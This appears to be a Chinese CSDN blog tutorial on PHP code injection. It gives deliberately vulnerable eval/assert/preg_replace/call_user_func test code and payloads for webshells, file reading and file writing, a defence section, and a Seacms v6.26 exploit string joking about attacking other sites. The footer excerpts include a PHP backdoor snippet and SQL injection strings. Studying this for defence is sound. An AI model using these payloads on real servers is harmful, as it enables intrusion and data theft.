052 php代码注入

于 2022-03-10 16:00:26 发布
阅读量1.8k 收藏 3
点赞数 1
分类专栏: 网络安全 文章标签: php 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34555653/article/details/123368331
版权

文章目录

一:RCE概念

RCE:远程代码执行
英文全称:remote command/code execute
 
 

二:PHP代码注入原理以及成因

PHP代码执行(注入)(web方向)是指应用程序过滤不严,用户可以通过请求将代码注入到应用中执行。代码执行类似于SQL注入漏洞。sqli是将sql语句注入到数据库中执行,而代码执行则是可以把代码注入到应用中,最终由服务器运行它。这样的漏洞如果没有特殊的过滤,相当于直接有一个web后门的存在。

成因:
1:程序中含有可以执行的PHP代码的函数或者语言结构
2:传入第一点中的参数,客户端可控,直接修改或者影响。
 
 

三:漏洞的危害

web应用如果存在代码执行漏洞是一件非常可怕的事情,就像一个人没有穿衣服,赤裸裸的暴露在光天化日之下。可以通过代码执行漏洞继承web用户权限,执行任意代码。如果服务器没有正确配置,web用户权限比较高的话,我们可以读写目标服务器任意文件内容,甚至控制整个网站以及服务器。接下来,以PHP为例子来说明,代码执行漏洞。php中有很多函数和语句都会造成PHP代码执行漏洞。
 
 

四:相关的函数和语句

4.1:eval()

eval()会将字符串当作php代码来执行。

<?php
if(isset($_GET['code'])){
	$str=$_GET['code'];
	eval($str);
}else{
echo "please input code!<br />?code=phpinfo();";
}
?>

首先准备好phpstudy环境,这里略过了,可以去看
031 基础环境搭建phpstudy

我们在www目录下,新建一个code_input的文件夹,然后在这个文件夹中新建一个eval.php文件
在这里插入图片描述
在这里插入图片描述
打开浏览器:
在这里插入图片描述
在这里插入图片描述

?code=phpinfo();也可以替换成?code=${phpinfo()};或者?code=1;phpinfo();
 

4.2:assert()

assert()和eval()同样会做为php代码执行。
测试代码如下:

<?php
if(isset($_GET['code'])){
	$str=$_GET['code'];
	assert($str);
}else{
	echo "please input code!<br />?code=phpinfo();";
}
?>

在这里插入图片描述
?code=phpinfo();也可以替换成?code=${phpinfo()};
但是这个不行?code=1;phpinfo();(个人试验了下)
在这里插入图片描述

4.3:preg_replace()

preg_replace()函数的作用是对字符串进行正则处理。

先看下示例:
在这里插入图片描述

参数和返回值如下:mixed preg_replace(mixed $pattern,mixed $replacement,mixed $subject[,int limit = -1[,int &$count]])

$replacement的值会被当成php代码来执行。典型的代码如下:

<?php
	if(isset($_GET['code'])){
		$code=$_GET['code'];
		preg_replace("/\[(.*)\]/e",'\\1',$code);		/\[(.*)\]/e:显示的内容就是[]内的内容	\\1:是replacement的特殊用法,代表这个正则第一次匹配的内容
	}else{
		echo "?code=[phpinfo()]";
	}
?>

在这里插入图片描述
在这里插入图片描述
 

4.4:call_user_func()

call_user_func()等函数都有调用其他函数的功能,其中的一个参数作为要调用的函数名,那如果这个传入的函数名可控,那就可以调用意外的函数来执行我们想要的代码,也就是存在任意代码执行漏洞。

以call_user_func()为例子,该函数的第一个参数作为回调函数,后面的参数为回调函数的参数,测试代码如下:

<?php
	if(isset($_GET['fun'])){
		$fun=$_GET['fun'];
		$para=$_GET['para'];
		call_user_func($fun,$para);
	}else{
		echo "?fun=assert&amp;para=phpinfo()";
	}
?>
提交参数?fun=assert&para=phpinfo()

在这里插入图片描述
 

4.5:动态函数$a($b)

由于php的特性原因,php的函数支持由直接拼接的方式调用,这就导致了PHP在安全上的控制又加大了难度。不少知名程序中也用到了动态函数的写法,这种写法跟使用call_user_func()的初衷是一样的,用来更加方便的调用函数,但是一旦过滤不严格就会造成代码执行漏洞。

测试代码如下:

<?php
	if(isset($_GET['a'])){
		$a=$_GET['a'];
		$b=$_GET['b'];
		$a($b);
	}else{
		echo "?a=assert&amp;b=phpinfo()";
	}
?>

在这里插入图片描述
 
 

五:漏洞利用

代码执行漏洞的利用方式有很多种,以下简单列出几种。

5.1:直接获取shell

提交参数?code=@eval($_REQUEST[1]);即可构成一句话木马,密码为1。可以使用菜刀(软件名)连接。 REQUEST包括get,post,cookie

连接成功
 

5.2:获取当前文件的绝对路径

__FILE__是PHP预定义常量,其含义当前文件的绝对路径。

提交代码?code=print(__FILE__);
在这里插入图片描述
 

5.3:读文件

我们可以利用file_get_contents()函数读取服务器任意文件,前提是知道目标文件路径和读取权限。

提交代码:
?code=var_dump(file_get_contents('c:\windows\system32\drivers\etc\hosts'));
读取服务器hosts文件。
在这里插入图片描述
 

5.4:写文件

我们可以利用file_put_contents()函数,写入文件。前提是知道可写目录。
提交代码:?code=var_dump(file_put_contents($_POST[1],$_POST[2]));
此时需要借助于hackbar通过post方式提交参数。
1=shell.php&2=<?php phpinfo()?>即可在当前目录下创建一个文件shell.php,并把phpinfo的内容写入到shell.php中。

直接执行报错:
在这里插入图片描述
在勾选hackbar里面的Post data并写入代码1=shell.php&2="sfsfdasfdsfdsfds"
在这里插入图片描述
在这里插入图片描述
 

亦或是写入php代码1=shell.php&2=<?php phpinfo()?>
在这里插入图片描述
 
 

六:防御方法

1、尽量不要使用eval等函数

2、如果使用的话一定要进行严格的过滤

3、preg_replace放弃使用/e修饰符

4、disable_functions = assert 禁用assert,但是disable_functions = eval不起作用,因为严格来说,eval在php中不是函数,而是一种数据结构,比较特殊。
 

方法4的验证:
我们查看PHP版本
在这里插入图片描述
在这里插入图片描述
进入对应的目录下,
在这里插入图片描述
在这里插入图片描述
保存文件,然后重启phpstudy
打开浏览器进入assert.php页面,发现assert函数被禁用。
在这里插入图片描述
 

七:实战:Seacms v6.26 命令执行

漏洞点?searchtype=5&tid=&area=phpinfo()
此处想象空间非常大。比如说:这是一个网站的模板。那么其他网站,是不是~~~~~~~~~~
6.53 6.54 6.55都存在代码注入漏洞

入狱计划进度50%
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
php注入方法集锦
phphot
03-07 2389
%23  and passWord=mypass id=-1 union select 1,1,1 id=-1 union select char(97),char(97),char(97) id=1 union select 1,1,1 from members id=1 union select 1,1,1 from admin id=1 union select 1,1,1 from 
php文件注入思路
一只懒猫的博客
05-16 279
打开题目给定url,发现有一个文件上传按钮,猜测可能是需要上传php文件对服务器进行查看。得到了上级文件的目录,发现了flag.php文件,继续上传php文件,执行查看命令。2.上传一张jpg图像,发现给定了图像存储的路径。3.于是使用浏览器权限绕过的方式,上传php文件。修改这两个地方,上传php文件并执行。1.上传一个文档文档,提示无法上传。修改这两个地方,查看上级文件目录。
PHP注入漏洞(附代码,具体步骤)
gl620321的博客
08-01 1724
一、命令注入(敏感函数定向法) 1.概念: 在PHP脚本中,我们可以对输入进行注入攻击。什么是注入注入即是通过利用无验证码变量构造特殊语句对服务器进行渗透。 注入的种类有很多,而不仅仅只是SQL Injection 2.分类 命令注入(Commend Injection) Eval 注入(Eval Injection) 客户端脚本攻击(Script Insertion) 跨网站脚本攻击(Cro...
PHP 代码注入知识点总结
千寻的博客
02-10 2095
文章目录第一章 概述第一节 原理以及成因第二节 形成原因第三节 漏洞危害第二章 相关函数和语句第一节 eval()第二节 assert()第三节 preg_replace()第四节 call_user_func()第六节 动态函数`$a($b)`第三章 漏洞利用第一节 直接获取Shell第二节 获取当前文件的绝对路径第三节 读文件第四节 写文件第四章 防御方法 第一章 概述 第一节 原理以及...
PHP代码审计----3、代码注入
七天
07-08 630
文章目录代码注入1、eval()函数2、preg_replace+/e()函数3、assert()4、call_user_func()5、call_user_func_array()6、create_function() 代码注入 PHP 可能出现代码注入的函数:eval()、preg_replace+/e()、assert()、call_user_func()、call_user_func_array()、create_function()等 查找程序中程序中使用这些函数的地方,检查提交变量是否用户可控
Php注入点构造代码
10-30
php注入代码,方便注入测试
PHP注入安全代码
10-30
判断传递的变量中是否含有非法字符我们把以下代码放到一个公共的文件里,比如security.inc.php里面,每个文件里都include一下这个文件,那么就能够给任何一个程序进行提交的所有变量进行过滤了,就达到了我们...
php注入代码
10-12
就可以做到页面防注入、跨站 如果想整站防注,就在网站的一个公用文件中,如数据库链接文件config.inc.php中! 添加require_once('waf.php');来调用本代码 常用php系统添加文件 PHPCMS V9 \phpcms\base.php PHPWIND...
php SQL防注入代码集合
10-30
php下实现sql防注入效果代码,asp的比较多,php的倒不多见,喜欢php的朋友可以参考下
360提供的php防sql注入代码修改类
05-02
本文将深入探讨360提供的PHP防SQL注入代码修改类,以及如何通过此类来防范这两种攻击。 一、SQL注入 SQL注入是一种利用网站应用程序的漏洞,通过输入恶意SQL语句来控制数据库的攻击手段。攻击者可以获取、修改、...
Php手工注入拿shell详细教程
04-18
Php手工注入拿shell详细教程Php手工注入拿shell详细教程Php手工注入拿shell详细教程Php手工注入拿shell详细教程Php手工注入拿shell详细教程Php手工注入拿shell详细教程Php手工注入拿shell详细教程Php手工注入拿shell详细教程Php手工注入拿shell详细教程Php手工注入拿shell详细教程Php手工注入拿shell详细教程Php手工注入拿shell详细教程Php手工注入拿shell详细教程Php手工注入拿shell详细教程Php手工注入拿shell详细教程Php手工注入拿shell详细教程Php手工注入拿shell详细教程Php手工注入拿shell详细教程Php手工注入拿shell详细教程Php手工注入拿shell详细教程Php手工注入拿shell详细教程Php手工注入拿shell详细教程Php手工注入拿shell详细教程Php手工注入拿shell详细教程Php手工注入拿shell详细教程Php手工注入拿shell详细教程Php手工注入拿shell详细教程Php手工注入拿shell详细教程Php手工注入拿shell详细教程Php手工注入
php sql 注入例子代码
freshfox的博客
06-23 2786
&lt;?php $servername = "localhost"; $username = "root"; $password = "root"; $conn = mysqli_connect($servername, $username, $password); // 检测连接 if (!$conn) { die("Connection failed: " . mysqli_c...
存在注入php代码,PHP代码审计之命令注入
weixin_35733852的博客
03-21 142
命令注入命令注入就是通过利用无验证变量构造特殊语句对服务器进行渗透.注入的种类有很多,而不仅仅是SQL Injection. php常见注入有以下几种(常见:,常见!!):命令注入 (Command Injection)Eval注入(Eval Injection)客户端脚本攻击(Script Injection)跨网站脚本攻击(Cross Site Scripting,XSS)SQL注入攻击(SQ...
PHP create_function()代码注入
weixin_33965305的博客
02-19 495
第一部分:介绍php函数 create_function():string create_function ( string $args , string $code )string $args 变量部分string $code 方法代码部分举例:create_function('$fname','echo$fname."Zhang"')类似于:func...
PHP 代码审计之 SQL 注入
发哥微课堂
08-30 972
0x00:前言 用 CMS 做例子,今天刚下载安装,因为首页的搜索功能比较显眼,所以看了一下是存在 sql 注入的,基本没有防护机制,CMS 比较冷门,不属于热门,所以安全性也低一点,做审计练手很合适。 0x01:代码追踪 搜索时 URL 如下:/archives/detail.php?name=1,通过 URL 可知其相应的 php 文件为 archives 下的 detail.php,打...
随记(五):一个简单又较隐蔽的PHP后门
XXR_Beta的博客
12-05 556
话不多说,直接上代码(backdoor.php) <?php function adminer($url, $isi) { $fp = fopen($isi, "w"); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_BINARYTRANSFER, true); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_seto
php植入后门,网站被植入后门代码
weixin_29539039的博客
03-18 321
郎朗坤error_reporting(0);if($_GET['act'] == 'dl'){echo ('FN:URL:');if($_SERVER['REQUEST_METHOD'] == 'POST'){file_put_contents($_POST['fn'], file_get_contents($_POST['url']));}exit;}if($_GET['act'] == 'ul...
PHP注入的基本
Coisini的博客
05-24 1163
1.判断是否存在注入,加’;and 1=1;and 1=2 2.判断版本 and ord(mid(version(),1,1))>51 /* 返回正常说明是4.0以上版本,可以用union查询 3.利用order by 暴字段,在网址后加 order by 10 /* 如果返回正常说明字段大于10 4.再利用union来查询准确字段,如: and 1=2 union select 1,2,3...
PHP命令注入
Jack huang的专栏
03-26 1088
使用下列5个函数来执行外部的应用程序或函数 system、exec、passthru、shell_exec、“`”
CTF PHP代码注入
最新发布
07-15
CTF(Capture The Flag)竞赛中,常见的一个攻击技术是PHP代码注入PHP Code Injection)。这种攻击利用了应用程序对用户输入的不充分验证和过滤,使得攻击者能够将恶意的PHP代码注入到应用程序中,从而执行任意...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值